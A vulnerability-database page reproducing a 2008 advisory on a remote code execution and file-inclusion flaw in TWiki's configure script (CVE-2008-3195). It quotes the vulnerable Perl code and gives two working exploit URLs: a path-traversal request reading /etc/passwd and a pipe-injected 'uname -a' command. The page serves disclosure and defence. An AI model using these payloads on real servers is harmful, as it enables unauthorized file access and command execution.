Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2008-3195

Publish Date: 22 Sep 2008

Author: webDEViL

Source

                							

                #-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
#-----------TWiki Remote Code Execution &lt;= 4.2.2--------------------#

# ----------developers site: http://www.twiki.org-------------------#
# ----------CVE Id(s)      : CVE-2008-3195--------------------------#

# http://twiki.org/cgi-bin/view/Codev/DownloadTWiki#4_2_3_Bugfix_Highlights

The "configure" file in TWiki's bin folder is vulnerable to code execution and local file inclusion.

According to TWiki's documentation this file is meant to be protected with .htaccess, but many a times you find it is not ;)

Vulnerable code:

if( $action eq 'image' ) {
    # SMELL: this call is correct, but causes a perl error

    # on some versions of CGI.pm
    # print $query-&gt;header(-type =&gt; $query-&gt;param('type'));
    # So use this instead:
    print 'Content-type: '.$query-&gt;param('type')."\n\n";

    if( open(F, 'logos/'.$query-&gt;param('image' ))) {
        local $/ = undef;
        print &lt;F&gt;;
        close(F);
    }

http://localhost/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain

http://localhost/twiki/bin/configure?action=image;image=|uname -a|;type=text/plain


<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

twiki-exec.txt

Vulmon Search

About

Products

Connect